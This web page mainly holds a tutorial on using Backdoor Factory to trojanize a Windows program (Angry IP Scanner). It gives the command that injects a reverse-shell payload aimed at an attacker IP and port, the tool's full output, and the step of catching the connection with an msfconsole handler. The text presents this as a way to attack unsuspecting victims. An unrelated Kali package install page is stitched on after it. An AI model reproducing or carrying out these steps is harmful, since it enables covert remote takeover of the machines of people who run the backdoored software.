- Backdoor factory – How to inject shell-code into windows application
- Video Demo
- Step 1
- Step 2
- Step 3
- backdoor-factory on Kali Linux
- 2. Uninstall / Remove backdoor-factory package
- 3. Details of backdoor-factory package
- 4. References on Kali Linux
- 5. The same packages on other Linux Distributions
- How To Install backdoor-factory on Kali Linux
- What is backdoor-factory
- Install backdoor-factory Using apt-get
- Install backdoor-factory Using apt
- Install backdoor-factory Using aptitude
- How To Uninstall backdoor-factory on Kali Linux
- Uninstall backdoor-factory And Its Dependencies
- Remove backdoor-factory Configurations and Data
- Remove backdoor-factory configuration, data, and all of its dependencies
- References
- Summary
Backdoor factory – How to inject shell-code into windows application
Backdoor factory (BDF) is a pre-installed application in Kali Linux, its used to inject shell-code to any windows application. BDF can inject custom shell-code to an existing binary by adding malicious code in between the genuine source code. First it scans the entire binary and checks compatible payloads then it searches the entire code and displays available caves where our malicious code can reside without affecting the working of the application. Code caves are generated by compilers. A code compiler will have to pad certain areas of the binary and it does so by padding with a whole series of 0x00 bytes known as code caves. Backdoor factory overwrites those code caves with shell-code. We can choose any of the caves and make the executable.
The infected application will work as its intended but the shell-code will be executed in the background. No suspicious activity will be noticed by the normal user. This can target any windows system regardless of the version. This tool is being used by hackers to attack the victim other than the msfvenom payload generator. The working is same as the msfvenom payload, you need to setup reverse handler in msfcosole for a reverse connection and wait for the victim to connect back. Personally i prefer this method over the old windows hacking technique.
However this wont work on protected applications, most of the windows app is vulnerable to this attack. First of all you need to pick a light weight portable executable. Here im injecting code to “Angry IP scanner”. follow the steps .
Video Demo
Step 1
Choose any application and use backdoor factory to check for available payloads
it will show up like this.
root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s show
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactoryVersion: 3.0.5[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded
root@anonymous:~/Desktop#
Step 2
now choose one of the shell-code and inject it into the executable with attacker IP and Port for reverse connection
root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s reverse_shell_tcp_inline -H 192.168.1.101 -P 444
-.(`-‘) (`-‘) _ .-> .-> <-.(OO )
‘-‘—. / ,—. -,—–.’-‘. ,–. .’_ (`-‘)—-. (`-‘)—-. ,——,)
| .-. (/ | /`. | .–./| .’ /’`’-..__)( OO).-. ‘( OO).-. ‘| /`. ‘
| ‘-‘ `.) ‘-‘|_.’ | /_) (`-‘)| /)| | ‘ |( _) | | |( _) | | || |_.’ |
| /`’. |(| .-. | || |OO )| . ‘ | | / : | |)| | | |)| || . .’
| ‘–‘ / | | | |(_’ ‘–‘| | | ‘-‘ / ‘ ‘-‘ ‘ ‘ ‘-‘ ‘| |
`——‘ `–‘ `–‘ `—–‘`–‘ ‘–‘`——‘ `—–‘ `—–‘ `–‘ ‘–‘
(`-‘) _ (`-‘) (`-‘)
.-> <-.(OO ) .->
(`-‘)—–./ ,—. -,—–./ ‘._ (`-‘)—-. ,——,) ,–.’ ,-.
(OO|(_—‘| /`. | .–./|’–…__)( OO).-. ‘| /`. ‘(`-‘)’.’ /
/ | ‘–. ‘-‘|_.’ | /_) (`-‘)`–. .–‘( _) | | || |_.’ |(OO /
_) .–‘(| .-. | || |OO ) | | | |)| || . .’ | / /)
`| |_) | | | |(_’ ‘–‘ | | ‘ ‘-‘ ‘| | `-/ /`
`–‘ `–‘ `–‘ `—–‘ `–‘ `—–‘ `–‘ ‘–‘ `–‘Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactoryVersion: 3.0.5[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 366
[*] All caves lengths: 366
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don’t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 366
[*] Available caves:
1. Section Name: None;Section Begin: None End: None; Cave begin:0x26c End: 0x3fc; Cave Size:400
2. Section Name: .text;Section Begin: 0x400 End: 0x4e00; Cave begin:0x4c30 End: 0x4dfc; Cave Size: 460
3. Section Name: .rdata;Section Begin: 0x5000 End: 0x5600; Cave begin:0x545e End: 0x55fc; Cave Size:414
4. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe398 End: 0xe580; Cave Size:488
5. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe598 End: 0xe784; Cave Size:492
6. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe79c End: 0xe984; Cave Size:488
7. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe9a0 End: 0xeb84; Cave Size:484
8. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeba4 End: 0xed84; Cave Size:480
9. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeda8 End: 0xef88; Cave Size:480
10. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xefac End: 0xf188; Cave Size:476
11. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf1ac End: 0xf388; Cave Size:476
12. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf3b0 End: 0xf588; Cave Size:472
13. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf5b4 End: 0xf78c; Cave Size:472
14. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf7b8 End: 0xf98c; Cave Size:468
15. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf9bc End: 0xfb8c; Cave Size:464
16. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfbc0 End: 0xfd90; Cave Size:464
17. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfdc0 End: 0xff90; Cave Size:464
18. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000;Cave begin:0xffc4 End: 0x10190;Cave Size:460
19. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x101c8 End: 0x10390;Cave Size:456
20. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x10410 End: 0x10594;Cave Size:388
22. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x1e0a0 End: 0x1e2ec;Cave Size:588
23. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x22e21 End: 0x22ffc;Cave Size:475
**************************************************
[!] Enter your selection:
All the available caves will be shown and will prompt for user input. Choose any cave.
[!] Enter your selection: 11
[!] Using selection: 11
[*] Changing flags for section: .rsrc
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File ip-scanner.exe is in the ‘backdoored’ directory
Step 3
The backdoored file will be generated in the “backdoor” folder. now you can setup msfcosole payload handler. Choose same payload,port,IP that you have chosen for BDF
Wait for a minute, msfconsole will come up. Use handler then, set payload and port.
backdoor-factory on Kali Linux
This is a short guide on how to install backdoor-factory package:
2. Uninstall / Remove backdoor-factory package
Please follow the step by step instructions below to uninstall backdoor-factory package:
3. Details of backdoor-factory package
Package: backdoor-factory
Version: 3.4.2+dfsg-5
Installed-Size: 735
Maintainer: Debian Security Tools
Architecture: all
Depends: python3:any, curl, python3-capstone (>= 3.0), python3-pkg-resources (>= 39.2.0), python3-pefile, osslsigncode
Size: 86428
SHA256: a4d289bd629780a0b53a6396335f63c790ec34f8b077da7f82404d6f314a952a
SHA1: 9c5d83b476bfd5830b678a72615b550bfb3e1c4a
MD5sum: b738164f356b4e832367b7bc45877e0c
Description: Patch 32/64 bits ELF & win32/64 binaries with shellcode
Injects shellcode into win32/64 PE files, 32/64bits ELF binaries, to continue
normal file execution (if the shellcode supports it), by patching the exe/dll
directly.
.
Some executables have built in protections, as such this will not work on all
ELF/PE files. It is advisable that you test target ELF/PE files before
deploying them to clients or using them in exercises
Description-md5: 7697c24a3682cefc109a5849b79d6b0c
Homepage: https://github.com/secretsquirrel/the-backdoor-factory
Section: utils
Priority: optional
Filename: pool/main/b/backdoor-factory/backdoor-factory_3.4.2+dfsg-5_all.deb
4. References on Kali Linux
5. The same packages on other Linux Distributions
backdoor-factory (3.4.2+dfsg-2) Ubuntu 18.04 LTS (Bionic Beaver)
backdoor-factory (3.4.2+dfsg-5) Ubuntu 21.04 (Hirsute Hippo)
backdoor-factory (3.4.2+dfsg-4) Ubuntu 20.10 (Groovy Gorilla)
backdoor-factory (3.4.2+dfsg-5) Ubuntu 21.10 (Impish Indri)
backdoor-factory (3.4.2+dfsg-5) Ubuntu 22.04 LTS (Jammy Jellyfish)
backdoor-factory (3.4.2+dfsg-4) Debian 10 (Buster)
How To Install backdoor-factory on Kali Linux
In this tutorial we learn how to install backdoor-factory on Kali Linux.
What is backdoor-factory
Injects shellcode into win32/64 PE files, 32/64bits ELF binaries, to continue normal file execution (if the shellcode supports it), by patching the exe/dll directly.
Some executables have built in protections, as such this will not work on all ELF/PE files. It is advisable that you test target ELF/PE files before deploying them to clients or using them in exercises
There are three ways to install backdoor-factory on Kali Linux . We can use apt-get , apt and aptitude . In the following sections we will describe each method. You can choose one of them.
Install backdoor-factory Using apt-get
Update apt database with apt-get using the following command.
After updating apt database, We can install backdoor-factory using apt-get by running the following command:
sudo apt-get -y install backdoor-factory
Install backdoor-factory Using apt
Update apt database with apt using the following command.
After updating apt database, We can install backdoor-factory using apt by running the following command:
sudo apt -y install backdoor-factory
Install backdoor-factory Using aptitude
If you want to follow this method, you might need to install aptitude first since aptitude is usually not installed by default on Kali Linux. Update apt database with aptitude using the following command.
After updating apt database, We can install backdoor-factory using aptitude by running the following command:
sudo aptitude -y install backdoor-factory
How To Uninstall backdoor-factory on Kali Linux
To uninstall only the backdoor-factory package we can use the following command:
sudo apt-get remove backdoor-factory
Uninstall backdoor-factory And Its Dependencies
To uninstall backdoor-factory and its dependencies that are no longer needed by Kali Linux, we can use the command below:
sudo apt-get -y autoremove backdoor-factory
Remove backdoor-factory Configurations and Data
To remove backdoor-factory configuration and data from Kali Linux we can use the following command:
sudo apt-get -y purge backdoor-factory
Remove backdoor-factory configuration, data, and all of its dependencies
We can use the following command to remove backdoor-factory configurations, data and all of its dependencies, we can use the following command:
sudo apt-get -y autoremove --purge backdoor-factory
References
Summary
In this tutorial we learn how to install backdoor-factory using different package management tools like apt, apt-get and aptitude.